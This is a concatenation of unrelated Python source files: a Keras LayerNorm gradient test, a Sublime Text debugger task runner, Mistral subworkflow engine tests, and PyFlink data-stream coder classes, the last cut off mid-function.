with test.mock.patch.object(norm, 'gamma', gamma):
return norm(x)
# pylint: enable=cell-var-from-loop
results = gradient_checker_v2.compute_gradient(
forward_fn, [keras.backend.cast(x, dtype), norm.beta, norm.gamma])
([x_grad_t, beta_grad_t, gamma_grad_t],
[x_grad_n, beta_grad_n, gamma_grad_n]) = results
if dtype == 'float64':
# We use the float64 numeric gradients as the reference, to compare
# against the symbolic gradients for all dtypes.
x_grad_ref = x_grad_n
beta_grad_ref = beta_grad_n
gamma_grad_ref = gamma_grad_n
tol = fp64_tol
elif dtype == 'float32':
tol = fp32_tol
else:
assert dtype == 'float16'
tol = fp16_tol
# We use absolute tolerances in addition to relative tolerances, because
# some of the values are very close to zero.
self.assertAllClose(x_grad_t, x_grad_ref, rtol=tol, atol=tol)
self.assertAllClose(beta_grad_t, beta_grad_ref, rtol=tol, atol=tol)
self.assertAllClose(gamma_grad_t, gamma_grad_ref, rtol=tol, atol=tol)
# The gradient_checker_v2 does not work properly with LayerNorm in graph mode.
@testing_utils.run_v2_only
def test_backward(self):
# For numeric stability, we ensure the axis's dimension(s) have at least 4
# elements.
self._test_backward_pass((4, 3), (0,))
self._test_backward_pass((2, 4, 2), (1,))
self._test_backward_pass((2, 3, 4), (2,))
self._test_backward_pass((2, 3, 2), (0, 2), fp64_tol=5e-4, fp32_tol=5e-4)
self._test_backward_pass((2, 2, 2, 2), (1, 3))
self._test_backward_pass((2, 2, 2, 2), (2, 3))
if __name__ == '__main__':
test.main()
|
|
from __future__ import annotations
from dataclasses import dataclass
from typing import Dict, Any, List, TypedDict, Callable
import re
import sublime
import Default #type: ignore
import time
from .import core
from .import dap
from .panel import OutputPanel
from .output_view import OutputView
@dataclass
class Problem:
message: str
source: dap.SourceLocation
class Position(TypedDict):
line: int
character: int|None
class Range(TypedDict):
start: Position
class Diagnostic(TypedDict):
range: Range
severity: int
message: str
class Diagnostics(TypedDict):
file: str
base: str|None
errors: list[Diagnostic]
class TerminalTask:
def __init__(self, window: sublime.Window, task: dap.TaskExpanded, on_closed: Callable[[], None]):
arguments = task.copy()
name: str
cmd: str|list[str]|None = arguments.get('cmd')
if 'name' in arguments:
name = arguments['name']
elif isinstance(cmd, str):
name = cmd
elif isinstance(cmd, list):
name = cmd and cmd[0] #type: ignore
else:
name = 'Untitled'
self.background = arguments.get('background', False)
self.name = name
self.view = OutputView(window, 'Task', on_closed)
self.finished = False
# if we don't remove these additional arguments Default.exec.ExecCommand will be unhappy
if 'name' in arguments:
del arguments['name']
if 'background' in arguments:
del arguments['background']
if '$' in arguments:
del arguments['$']
self.on_problems_updated: core.Event[None] = core.Event()
self.diagnostics_per_file: list[Diagnostics] = []
self.future: core.Future[None] = core.Future()
self.window = window
# only save the views that have an assigned file
for view in self.window.views():
if view.file_name() and view.is_dirty():
view.run_command('save')
self.panel = OutputPanel(self.window, name, show_panel=False)
self.command = Exec(self.window)
self.command.output_view = self.panel.view
self.command.run(self, arguments)
self.on_view_load_listener = core.on_view_load.add(self.on_view_load)
def show_backing_panel(self):
self.panel.open()
def on_view_load(self, view: sublime.View):
# refresh the phantoms from exec
self.command.update_annotations()
def dispose(self):
try:
self.command.proc.kill()
except Exception as e:
core.log_exception(e)
self.command.hide_annotations()
self.on_view_load_listener.dispose()
self.panel.dispose()
self.view.dispose()
def write_stdout(self, text: str):
self.view.write(text)
async def wait(self) -> None:
try:
await self.future
except core.CancelledError as e:
print(f'Command cancelled {self.name}')
self.command.run(self, {
'kill': True
})
raise e
def on_output(self, characters: str):
self.write_stdout(characters)
def on_updated_errors(self, errors_by_file):
self.diagnostics_per_file.clear()
for file, errors in errors_by_file.items():
diagnostics: list[Diagnostic] = []
for error in errors:
diagnostic: Diagnostic = {
'severity': 1,
'message': error[2],
'range': {
'start': {
'line': error[0],
'character': error[1]
}
}
}
diagnostics.append(diagnostic)
self.diagnostics_per_file.append({
'file': file,
'base': None,
'errors': diagnostics
})
self.on_problems_updated.post()
def on_finished(self, exit_code: int|None, exit_status: str):
self.finished = True
self.exit_code = exit_code
self.exit_status = exit_status
if self.future.done():
return
if exit_code is None:
self.future.cancel()
elif exit_code == 0:
self.future.set_result(None)
else:
self.future.set_exception(core.Error(f'Command {self.name} failed with exit_code {exit_code}'))
class Exec(Default.exec.ExecCommand):
def run(self, instance: TerminalTask, args: Any):
self.instance = instance
panel = self.window.active_panel()
super().run(**args)
# return to previous panel we don't want to show the build results panel
self.window.run_command("show_panel", {"panel": panel})
def update_annotations(self):
super().update_annotations()
self.instance.on_updated_errors(self.errs_by_file)
def on_finished(self, proc):
super().on_finished(proc)
# modified from Default exec.py
if self.instance:
if proc.killed:
status = "[Cancelled]"
code: int|None = None
else:
elapsed = time.time() - proc.start_time
code: int|None = proc.exit_code() or 0
if code == 0:
status = "[Finished in %.1fs]" % elapsed
else:
status = "[Finished in %.1fs with exit code %d]" % (elapsed, code)
self.instance.on_finished(code, status)
# self.window.run_command("next_result")
def write(self, characters: str):
super().write(characters)
self.instance.on_output(characters)
class Tasks:
tasks: list[TerminalTask]
added: core.Event[TerminalTask]
removed: core.Event[TerminalTask]
updated: core.Event[TerminalTask]
def __init__(self) -> None:
self.added = core.Event()
self.removed = core.Event()
self.updated = core.Event()
self.tasks = []
def is_active(self):
for task in self.tasks:
if not task.finished:
return True
return False
@core.schedule
async def run(self, window: sublime.Window, task: dap.TaskExpanded):
def on_closed():
self.cancel(terminal)
terminal = TerminalTask(window, task, on_closed)
terminal.on_problems_updated.add(lambda: self.updated(terminal))
self.tasks.append(terminal)
self.added(terminal)
try:
await terminal.wait()
except:
raise
finally:
self.updated(terminal)
def remove_finished_terminals(self):
for task in self.tasks:
if task.finished:
task.view.close()
def remove_finished(self):
for task in self.tasks:
if task.finished:
task.dispose()
self.tasks = list(filter(lambda t: not t.finished, self.tasks))
return False
def cancel(self, task: TerminalTask):
try:
self.tasks.remove(task)
except ValueError:
return
# todo actually cancel...
self.removed(task)
task.dispose()
def clear(self):
while self.tasks:
if not self.tasks[-1].finished:
continue
task = self.tasks.pop()
self.removed(task)
task.dispose()
def dispose(self):
while self.tasks:
task = self.tasks.pop()
self.removed(task)
task.dispose()
|
|
# Copyright 2014 - Mirantis, Inc.
# Copyright 2015 - StackStorm, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mock
from oslo_config import cfg
from mistral.actions import std_actions
from mistral import context as auth_context
from mistral.db.v2 import api as db_api
from mistral import exceptions as exc
from mistral.services import workbooks as wb_service
from mistral.tests.unit.engine import base
from mistral.workflow import states
# Use the set_default method to set value otherwise in certain test cases
# the change in value is not permanent.
cfg.CONF.set_default('auth_enable', False, group='pecan')
WB1 = """
---
version: '2.0'
name: wb1
workflows:
wf1:
type: reverse
input:
- param1
- param2
output:
final_result: <% $.final_result %>
tasks:
task1:
action: std.echo output=<% $.param1 %>
publish:
result1: <% task(task1).result %>
task2:
action: std.echo output="'<% $.param1 %> & <% $.param2 %>'"
publish:
final_result: <% task(task2).result %>
requires: [task1]
wf2:
type: direct
output:
slogan: <% $.slogan %>
tasks:
task1:
workflow: wf1 param1='Bonnie' param2='Clyde' task_name='task2'
publish:
slogan: "<% task(task1).result.final_result %> is a cool movie!"
"""
WB2 = """
---
version: '2.0'
name: wb2
workflows:
wf1:
type: direct
tasks:
task1:
workflow: wf2
wf2:
type: direct
output:
var1: <% $.does_not_exist %>
tasks:
task1:
action: std.noop
"""
WB3 = """
---
version: '2.0'
name: wb3
workflows:
wf1:
input:
- wf_name
output:
sub_wf_out: <% $.sub_wf_out %>
tasks:
task1:
workflow: <% $.wf_name %>
publish:
sub_wf_out: <% task(task1).result.sub_wf_out %>
wf2:
output:
sub_wf_out: wf2_out
tasks:
task1:
action: std.noop
"""
WB4 = """
---
version: '2.0'
name: wb4
workflows:
wf1:
input:
- wf_name
- inp
output:
sub_wf_out: <% $.sub_wf_out %>
tasks:
task1:
workflow: <% $.wf_name %>
input: <% $.inp %>
publish:
sub_wf_out: <% task(task1).result.sub_wf_out %>
wf2:
input:
- inp
output:
sub_wf_out: <% $.inp %>
tasks:
task1:
action: std.noop
"""
WB5 = """
---
version: '2.0'
name: wb5
workflows:
wf1:
input:
- wf_name
- inp
output:
sub_wf_out: '{{ _.sub_wf_out }}'
tasks:
task1:
workflow: '{{ _.wf_name }}'
input: '{{ _.inp }}'
publish:
sub_wf_out: '{{ task("task1").result.sub_wf_out }}'
wf2:
input:
- inp
output:
sub_wf_out: '{{ _.inp }}'
tasks:
task1:
action: std.noop
"""
WB6 = """
---
version: '2.0'
name: wb6
workflows:
wf1:
tasks:
task1:
workflow: wf2
wf2:
tasks:
task1:
workflow: wf3
wf3:
tasks:
task1:
action: std.noop
"""
class SubworkflowsTest(base.EngineTestCase):
def setUp(self):
super(SubworkflowsTest, self).setUp()
wb_service.create_workbook_v2(WB1)
wb_service.create_workbook_v2(WB2)
wb_service.create_workbook_v2(WB3)
wb_service.create_workbook_v2(WB4)
wb_service.create_workbook_v2(WB5)
wb_service.create_workbook_v2(WB6)
def test_subworkflow_success(self):
wf2_ex = self.engine.start_workflow('wb1.wf2')
project_id = auth_context.ctx().project_id
# Execution of 'wf2'.
self.assertEqual(project_id, wf2_ex.project_id)
self.assertIsNotNone(wf2_ex)
self.assertDictEqual({}, wf2_ex.input)
self.assertDictEqual({'namespace': ''}, wf2_ex.params)
self._await(lambda: len(db_api.get_workflow_executions()) == 2, 0.5, 5)
wf_execs = db_api.get_workflow_executions()
self.assertEqual(2, len(wf_execs))
# Execution of 'wf2'.
wf1_ex = self._assert_single_item(wf_execs, name='wb1.wf1')
wf2_ex = self._assert_single_item(wf_execs, name='wb1.wf2')
self.assertEqual(project_id, wf1_ex.project_id)
self.assertIsNotNone(wf1_ex.task_execution_id)
self.assertDictContainsSubset(
{
'task_name': 'task2',
'task_execution_id': wf1_ex.task_execution_id
},
wf1_ex.params
)
self.assertDictEqual(
{
'param1': 'Bonnie',
'param2': 'Clyde'
},
wf1_ex.input
)
# Wait till workflow 'wf1' is completed.
self.await_workflow_success(wf1_ex.id)
with db_api.transaction():
wf1_ex = db_api.get_workflow_execution(wf1_ex.id)
wf1_output = wf1_ex.output
self.assertDictEqual(
{'final_result': "'Bonnie & Clyde'"},
wf1_output
)
# Wait till workflow 'wf2' is completed.
self.await_workflow_success(wf2_ex.id, timeout=4)
with db_api.transaction():
wf2_ex = db_api.get_workflow_execution(wf2_ex.id)
wf2_output = wf2_ex.output
self.assertDictEqual(
{'slogan': "'Bonnie & Clyde' is a cool movie!"},
wf2_output
)
# Check project_id in tasks.
wf1_task_execs = db_api.get_task_executions(
workflow_execution_id=wf1_ex.id
)
wf2_task_execs = db_api.get_task_executions(
workflow_execution_id=wf2_ex.id
)
wf2_task1_ex = self._assert_single_item(wf1_task_execs, name='task1')
wf1_task1_ex = self._assert_single_item(wf2_task_execs, name='task1')
wf1_task2_ex = self._assert_single_item(wf1_task_execs, name='task2')
self.assertEqual(project_id, wf2_task1_ex.project_id)
self.assertEqual(project_id, wf1_task1_ex.project_id)
self.assertEqual(project_id, wf1_task2_ex.project_id)
@mock.patch.object(std_actions.EchoAction, 'run',
mock.MagicMock(side_effect=exc.ActionException))
def test_subworkflow_error(self):
self.engine.start_workflow('wb1.wf2')
self._await(lambda: len(db_api.get_workflow_executions()) == 2, 0.5, 5)
wf_execs = db_api.get_workflow_executions()
self.assertEqual(2, len(wf_execs))
wf1_ex = self._assert_single_item(wf_execs, name='wb1.wf1')
wf2_ex = self._assert_single_item(wf_execs, name='wb1.wf2')
# Wait till workflow 'wf1' is completed.
self.await_workflow_error(wf1_ex.id)
# Wait till workflow 'wf2' is completed, its state must be ERROR.
self.await_workflow_error(wf2_ex.id)
def test_subworkflow_yaql_error(self):
wf_ex = self.engine.start_workflow('wb2.wf1')
self.await_workflow_error(wf_ex.id)
wf_execs = db_api.get_workflow_executions()
self.assertEqual(2, len(wf_execs))
wf2_ex = self._assert_single_item(wf_execs, name='wb2.wf2')
self.assertEqual(states.ERROR, wf2_ex.state)
self.assertIn('Can not evaluate YAQL expression', wf2_ex.state_info)
# Ensure error message is bubbled up to the main workflow.
wf1_ex = self._assert_single_item(wf_execs, name='wb2.wf1')
self.assertEqual(states.ERROR, wf1_ex.state)
self.assertIn('Can not evaluate YAQL expression', wf1_ex.state_info)
def test_subworkflow_environment_inheritance(self):
env = {'key1': 'abc'}
wf2_ex = self.engine.start_workflow('wb1.wf2', env=env)
# Execution of 'wf2'.
self.assertIsNotNone(wf2_ex)
self.assertDictEqual({}, wf2_ex.input)
self.assertDictEqual(
{'env': env, 'namespace': ''},
wf2_ex.params
)
self._await(lambda: len(db_api.get_workflow_executions()) == 2, 0.5, 5)
wf_execs = db_api.get_workflow_executions()
self.assertEqual(2, len(wf_execs))
# Execution of 'wf1'.
wf1_ex = self._assert_single_item(wf_execs, name='wb1.wf1')
wf2_ex = self._assert_single_item(wf_execs, name='wb1.wf2')
expected_start_params = {
'task_name': 'task2',
'task_execution_id': wf1_ex.task_execution_id,
'env': env
}
self.assertIsNotNone(wf1_ex.task_execution_id)
self.assertDictContainsSubset(expected_start_params, wf1_ex.params)
# Wait till workflow 'wf1' is completed.
self.await_workflow_success(wf1_ex.id)
# Wait till workflow 'wf2' is completed.
self.await_workflow_success(wf2_ex.id)
def test_dynamic_subworkflow_wf2(self):
ex = self.engine.start_workflow('wb3.wf1', wf_input={'wf_name': 'wf2'})
self.await_workflow_success(ex.id)
with db_api.transaction():
ex = db_api.get_workflow_execution(ex.id)
self.assertEqual({'sub_wf_out': 'wf2_out'}, ex.output)
def test_dynamic_subworkflow_call_failure(self):
ex = self.engine.start_workflow(
'wb3.wf1',
wf_input={'wf_name': 'not_existing_wf'}
)
self.await_workflow_error(ex.id)
with db_api.transaction():
ex = db_api.get_workflow_execution(ex.id)
self.assertIn('not_existing_wf', ex.state_info)
def test_dynamic_subworkflow_with_generic_input(self):
self._test_dynamic_workflow_with_dict_param('wb4.wf1')
def test_dynamic_subworkflow_with_jinja(self):
self._test_dynamic_workflow_with_dict_param('wb5.wf1')
def test_string_workflow_input_failure(self):
ex = self.engine.start_workflow(
'wb4.wf1',
wf_input={'wf_name': 'wf2', 'inp': 'invalid_string_input'}
)
self.await_workflow_error(ex.id)
with db_api.transaction():
ex = db_api.get_workflow_execution(ex.id)
self.assertIn('invalid_string_input', ex.state_info)
def _test_dynamic_workflow_with_dict_param(self, wf_identifier):
ex = self.engine.start_workflow(
wf_identifier,
wf_input={'wf_name': 'wf2', 'inp': {'inp': 'abc'}}
)
self.await_workflow_success(ex.id)
with db_api.transaction():
ex = db_api.get_workflow_execution(ex.id)
self.assertEqual({'sub_wf_out': 'abc'}, ex.output)
def test_subworkflow_root_execution_id(self):
self.engine.start_workflow('wb6.wf1')
self._await(lambda: len(db_api.get_workflow_executions()) == 3, 0.5, 5)
wf_execs = db_api.get_workflow_executions()
wf1_ex = self._assert_single_item(wf_execs, name='wb6.wf1')
wf2_ex = self._assert_single_item(wf_execs, name='wb6.wf2')
wf3_ex = self._assert_single_item(wf_execs, name='wb6.wf3')
self.assertEqual(3, len(wf_execs))
# Wait till workflow 'wf1' is completed (and all the sub-workflows
# will be completed also).
self.await_workflow_success(wf1_ex.id)
with db_api.transaction():
wf1_ex = db_api.get_workflow_execution(wf1_ex.id)
wf2_ex = db_api.get_workflow_execution(wf2_ex.id)
wf3_ex = db_api.get_workflow_execution(wf3_ex.id)
self.assertIsNone(wf1_ex.root_execution_id, None)
self.assertEqual(wf2_ex.root_execution_id, wf1_ex.id)
self.assertEqual(wf3_ex.root_execution_id, wf1_ex.id)
|
|
################################################################################
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
################################################################################
import datetime
import decimal
import pickle
import struct
from typing import Any, Tuple
from typing import List
import pyarrow as pa
from apache_beam.coders.coder_impl import StreamCoderImpl, create_InputStream, create_OutputStream
from pyflink.fn_execution.ResettableIO import ResettableIO
from pyflink.common import Row, RowKind
from pyflink.table.utils import pandas_to_arrow, arrow_to_pandas
ROW_KIND_BIT_SIZE = 2
class FlattenRowCoderImpl(StreamCoderImpl):
def __init__(self, field_coders):
self._field_coders = field_coders
self._field_count = len(field_coders)
# the row kind uses the first 2 bits of the bitmap, the remaining bits are used for null
# mask, for more details refer to:
# https://github.com/apache/flink/blob/master/flink-core/src/main/java/org/apache/flink/api/java/typeutils/runtime/RowSerializer.java
self._leading_complete_bytes_num = (self._field_count + ROW_KIND_BIT_SIZE) // 8
self._remaining_bits_num = (self._field_count + ROW_KIND_BIT_SIZE) % 8
self.null_mask_search_table = self.generate_null_mask_search_table()
self.null_byte_search_table = (0x80, 0x40, 0x20, 0x10, 0x08, 0x04, 0x02, 0x01)
self.row_kind_search_table = [0x00, 0x80, 0x40, 0xC0]
self.data_out_stream = create_OutputStream()
@staticmethod
def generate_null_mask_search_table():
"""
Each bit of one byte represents if the column at the corresponding position is None or not,
e.g. 0x84 represents the first column and the sixth column are None.
"""
null_mask = []
for b in range(256):
every_num_null_mask = [(b & 0x80) > 0, (b & 0x40) > 0, (b & 0x20) > 0, (b & 0x10) > 0,
(b & 0x08) > 0, (b & 0x04) > 0, (b & 0x02) > 0, (b & 0x01) > 0]
null_mask.append(tuple(every_num_null_mask))
return tuple(null_mask)
def encode_to_stream(self, value, out_stream, nested):
field_coders = self._field_coders
data_out_stream = self.data_out_stream
self._write_mask(value, data_out_stream)
for i in range(self._field_count):
item = value[i]
if item is not None:
field_coders[i].encode_to_stream(item, data_out_stream, nested)
out_stream.write_var_int64(data_out_stream.size())
out_stream.write(data_out_stream.get())
data_out_stream._clear()
def encode_nested(self, value: List):
data_out_stream = self.data_out_stream
self._encode_one_row_to_stream(value, data_out_stream, True)
result = data_out_stream.get()
data_out_stream._clear()
return result
def decode_from_stream(self, in_stream, nested):
while in_stream.size() > 0:
in_stream.read_var_int64()
yield self._decode_one_row_from_stream(in_stream, nested)[1]
def _encode_one_row_to_stream(self, value, out_stream, nested):
field_coders = self._field_coders
if isinstance(value, Row):
self._write_mask(value, out_stream, value.get_row_kind().value)
else:
self._write_mask(value, out_stream)
for i in range(self._field_count):
item = value[i]
if item is not None:
field_coders[i].encode_to_stream(item, out_stream, nested)
def _decode_one_row_from_stream(
self, in_stream: create_InputStream, nested: bool) -> Tuple[int, List]:
row_kind_and_null_mask = self._read_mask(in_stream)
row_kind_value = 0
for i in range(ROW_KIND_BIT_SIZE):
row_kind_value += int(row_kind_and_null_mask[i]) * 2 ** i
return row_kind_value, [None if row_kind_and_null_mask[idx + ROW_KIND_BIT_SIZE] else
self._field_coders[idx].decode_from_stream(
in_stream, nested) for idx in range(0, self._field_count)]
def _write_mask(self, value, out_stream, row_kind_value=0):
field_pos = 0
null_byte_search_table = self.null_byte_search_table
remaining_bits_num = self._remaining_bits_num
# first byte contains the row kind bits
b = self.row_kind_search_table[row_kind_value]
for i in range(0, 8 - ROW_KIND_BIT_SIZE):
if field_pos + i < len(value) and value[field_pos + i] is None:
b |= null_byte_search_table[i + ROW_KIND_BIT_SIZE]
field_pos += 8 - ROW_KIND_BIT_SIZE
out_stream.write_byte(b)
for _ in range(1, self._leading_complete_bytes_num):
b = 0x00
for i in range(0, 8):
if value[field_pos + i] is None:
b |= null_byte_search_table[i]
field_pos += 8
out_stream.write_byte(b)
if self._leading_complete_bytes_num >= 1 and remaining_bits_num:
b = 0x00
for i in range(remaining_bits_num):
if value[field_pos + i] is None:
b |= null_byte_search_table[i]
out_stream.write_byte(b)
def _read_mask(self, in_stream):
mask = []
mask_search_table = self.null_mask_search_table
remaining_bits_num = self._remaining_bits_num
for _ in range(self._leading_complete_bytes_num):
b = in_stream.read_byte()
mask.extend(mask_search_table[b])
if remaining_bits_num:
b = in_stream.read_byte()
mask.extend(mask_search_table[b][0:remaining_bits_num])
return mask
def __repr__(self):
return 'FlattenRowCoderImpl[%s]' % ', '.join(str(c) for c in self._field_coders)
class RowCoderImpl(FlattenRowCoderImpl):
def __init__(self, field_coders, field_names):
super(RowCoderImpl, self).__init__(field_coders)
self.field_names = field_names
def encode_to_stream(self, value: Row, out_stream, nested):
self._encode_one_row_to_stream(value, out_stream, nested)
def decode_from_stream(self, in_stream, nested):
row_kind_value, fields = self._decode_one_row_from_stream(in_stream, nested)
row = Row(*fields)
row.set_field_names(self.field_names)
row.set_row_kind(RowKind(row_kind_value))
return row
def __repr__(self):
return 'RowCoderImpl[%s]' % ', '.join(str(c) for c in self._field_coders)
class TableFunctionRowCoderImpl(StreamCoderImpl):
def __init__(self, flatten_row_coder):
self._flatten_row_coder = flatten_row_coder
self._field_count = flatten_row_coder._field_count
def encode_to_stream(self, iter_value, out_stream, nested):
is_row_or_tuple = False
if iter_value:
if isinstance(iter_value, (tuple, Row)):
iter_value = [iter_value]
is_row_or_tuple = True
for value in iter_value:
if self._field_count == 1 and not is_row_or_tuple:
value = (value,)
self._flatten_row_coder.encode_to_stream(value, out_stream, nested)
out_stream.write_var_int64(1)
out_stream.write_byte(0x00)
def decode_from_stream(self, in_stream, nested):
return self._flatten_row_coder.decode_from_stream(in_stream, nested)
def __repr__(self):
return 'TableFunctionRowCoderImpl[%s]' % repr(self._flatten_row_coder)
class AggregateFunctionRowCoderImpl(StreamCoderImpl):
"""
The aggregate function row coder impl is similar to the table function row coder
(one message may produce two more message, e.g. one INSERT message may produce one
UPDATE_BEFORE message and one UPDATE_AFTER message). The difference is that this row
coder will encode row kind information into the output row and is no need to encode the
bytes which represent the end of output.
"""
def __init__(self, flatten_row_coder):
self._flatten_row_coder = flatten_row_coder
self._data_out_stream = create_OutputStream()
def encode_to_stream(self, iter_value, out_stream, nested):
data_out_stream = self._data_out_stream
for value in iter_value:
self._flatten_row_coder._encode_one_row_to_stream(value, data_out_stream, nested)
out_stream.write_var_int64(data_out_stream.size())
out_stream.write(data_out_stream.get())
data_out_stream._clear()
def decode_from_stream(self, in_stream, nested):
return [[item for item in self._flatten_row_coder.decode_from_stream(in_stream, nested)]]
def __repr__(self):
return 'AggregateFunctionRowCoderImpl[%s]' % repr(self._flatten_row_coder)
class BasicArrayCoderImpl(StreamCoderImpl):
def __init__(self, elem_coder):
self._elem_coder = elem_coder
def encode_to_stream(self, value, out_stream, nested):
out_stream.write_bigendian_int32(len(value))
for elem in value:
if elem is None:
out_stream.write_byte(False)
else:
out_stream.write_byte(True)
self._elem_coder.encode_to_stream(elem, out_stream, nested)
def decode_from_stream(self, in_stream, nested):
size = in_stream.read_bigendian_int32()
elements = [self._elem_coder.decode_from_stream(in_stream, nested)
if in_stream.read_byte() else None for _ in range(size)]
return elements
def __repr__(self):
return 'BasicArrayCoderImpl[%s]' % repr(self._elem_coder)
class PrimitiveArrayCoderImpl(StreamCoderImpl):
def __init__(self, elem_coder):
self._elem_coder = elem_coder
def encode_to_stream(self, value, out_stream, nested):
out_stream.write_bigendian_int32(len(value))
for elem in value:
self._elem_coder.encode_to_stream(elem, out_stream, nested)
def decode_from_stream(self, in_stream, nested):
size = in_stream.read_bigendian_int32()
elements = [self._elem_coder.decode_from_stream(in_stream, nested) for _ in range(size)]
return elements
def __repr__(self):
return 'PrimitiveArrayCoderImpl[%s]' % repr(self._elem_coder)
class PickledBytesCoderImpl(StreamCoderImpl):
def __init__(self):
self.field_coder = BinaryCoderImpl()
def encode_to_stream(self, value, out_stream, nested):
coded_data = pickle.dumps(value)
self.field_coder.encode_to_stream(coded_data, out_stream, nested)
def decode_from_stream(self, in_stream, nested):
return self._decode_one_value_from_stream(in_stream, nested)
def _decode_one_value_from_stream(self, in_stream: create_InputStream, nested):
real_data = self.field_coder.decode_from_stream(in_stream, nested)
value = pickle.loads(real_data)
return value
def __repr__(self) -> str:
return 'PickledBytesCoderImpl[%s]' % str(self.field_coder)
class DataStreamMapCoderImpl(StreamCoderImpl):
def __init__(self, field_coder):
self._field_coder = field_coder
self.data_out_stream = create_OutputStream()
def encode_to_stream(self, value, stream,
nested): # type: (Any, create_OutputStream, bool) -> None
data_out_stream = self.data_out_stream
self._field_coder.encode_to_stream(value, data_out_stream, nested)
stream.write_var_int64(data_out_stream.size())
stream.write(data_out_stream.get())
data_out_stream._clear()
def decode_from_stream(self, stream, nested): # type: (create_InputStream, bool) -> Any
while stream.size() > 0:
stream.read_var_int64()
yield self._field_coder.decode_from_stream(stream, nested)
def __repr__(self):
return 'DataStreamMapCoderImpl[%s]' % repr(self._field_coder)
class DataStreamFlatMapCoderImpl(StreamCoderImpl):
def __init__(self, field_coder):
self._field_coder = field_coder
def encode_to_stream(self, iter_value, stream,
nested): # type: (Any, create_OutputStream, bool) -> None
if iter_value:
for value in iter_value:
self._field_coder.encode_to_stream(value, stream, nested)
stream.write_var_int64(1)
stream.write_byte(0x00)
def decode_from_stream(self, stream, nested):
return self._field_coder.decode_from_stream(stream, nested)
def __str__(self) -> str:
return 'DataStreamFlatMapCoderImpl[%s]' % repr(self._field_coder)
class DataStreamCoFlatMapCoderImpl(StreamCoderImpl):
def __init__(self, field_coder):
self._field_coder = field_coder
def encode_to_stream(self, iter_value, stream,
nested): # type: (Any, create_OutputStream, bool) -> None
for value in iter_value:
self._field_coder.encode_to_stream(value, stream, nested)
def decode_from_stream(self, stream, nested):
return self._field_coder.decode_from_stream(stream, nested)
def __str__(self) -> str:
return 'DataStreamCoFlatMapCoderImpl[%s]' % repr(self._field_coder)
class MapCoderImpl(StreamCoderImpl):
def __init__(self, key_coder, value_coder):
self._key_coder = key_coder
self._value_coder = value_coder
def encode_to_stream(self, map_value, out_stream, nested):
out_stream.write_bigendian_int32(len(map_value))
for key in map_value:
self._key_coder.encode_to_stream(key, out_stream, nested)
value = map_value[key]
if value is None:
out_stream.write_byte(True)
else:
out_stream.write_byte(False)
self._value_coder.encode_to_stream(map_value[key], out_stream, nested)
def decode_from_stream(self, in_stream, nested):
size = in_stream.read_bigendian_int32()
map_value = {}
for _ in range(size):
key = self._key_coder.decode_from_stream(in_stream, nested)
is_null = in_stream.read_byte()
if is_null:
map_value[key] = None
else:
value = self._value_coder.decode_from_stream(in_stream, nested)
map_value[key] = value
return map_value
def __repr__(self):
return 'MapCoderImpl[%s]' % ' : '.join([repr(self._key_coder), repr(self._value_coder)])
class BigIntCoderImpl(StreamCoderImpl):
def encode_to_stream(self, value, out_stream, nested):
out_stream.write_bigendian_int64(value)
def decode_from_stream(self, in_stream, nested):
return in_stream.read_bigendian_int64()
class TinyIntCoderImpl(StreamCoderImpl):
def encode_to_stream(self, value, out_stream, nested):
out_stream.write(struct.pack('b', value))
def decode_from_stream(self, in_stream, nested):
return struct.unpack('b', in_stream.read(1))[0]
class SmallIntCoderImpl(StreamCoderImpl):
def encode_to_stream(self, value, out_stream, nested):
out_stream.write(struct.pack('>h', value))
def decode_from_stream(self, in_stream, nested):
return struct.unpack('>h', in_stream.read(2))[0]
class IntCoderImpl(StreamCoderImpl):
def encode_to_stream(self, value, out_stream, nested):
out_stream.write_bigendian_int32(value)
def decode_from_stream(self, in_stream, nested):
return in_stream.read_bigendian_int32()
class BooleanCoderImpl(StreamCoderImpl):
def encode_to_stream(self, value, out_stream, nested):
out_stream.write_byte(value)
def decode_from_stream(self, in_stream, nested):
return not not in_stream.read_byte()
class FloatCoderImpl(StreamCoderImpl):
def encode_to_stream(self, value, out_stream, nested):
out_stream.write(struct.pack('>f', value))
def decode_from_stream(self, in_stream, nested):
return struct.unpack('>f', in_stream.read(4))[0]
class DoubleCoderImpl(StreamCoderImpl):
def encode_to_stream(self, value, out_stream, nested):
out_stream.write_bigendian_double(value)
def decode_from_stream(self, in_stream, nested):
return in_stream.read_bigendian_double()
class DecimalCoderImpl(StreamCoderImpl):
def __init__(self, precision, scale):
self.context = decimal.Context(prec=precision)
self.scale_format = decimal.Decimal(10) ** -scale
def encode_to_stream(self, value, out_stream, nested):
user_context = decimal.getcontext()
decimal.setcontext(self.context)
value = value.quantize(self.scale_format)
bytes_value = str(value).encode("utf-8")
out_stream.write_bigendian_int32(len(bytes_value))
out_stream.write(bytes_value, False)
decimal.setcontext(user_context)
def decode_from_stream(self, in_stream, nested):
user_context = decimal.getcontext()
decimal.setcontext(self.context)
size = in_stream.read_bigendian_int32()
value = decimal.Decimal(in_stream.read(size).decode("utf-8")).quantize(self.scale_format)
decimal.setcontext(user_context)
return value
class BigDecimalCoderImpl(StreamCoderImpl):
def encode_to_stream(self, value, stream, nested):
bytes_value = str(value).encode("utf-8")
stream.write_bigendian_int32(len(bytes_value))
stream.write(bytes_value, False)
def decode_from_stream(self, stream, nested):
size = stream.read_bigendian_int32()
value = decimal.Decimal(stream.read(size).decode("utf-8"))
return value
class TupleCoderImpl(StreamCoderImpl):
def __init__(self, field_coders):
self._field_coders = field_coders
self._field_count = len(field_coders)
def encode_to_stream(self, value, out_stream, nested):
field_coders = self._field_coders
for i in range(self._field_count):
field_coders[i].encode_to_stream(value[i], out_stream, nested)
def decode_from_stream(self, stream, nested):
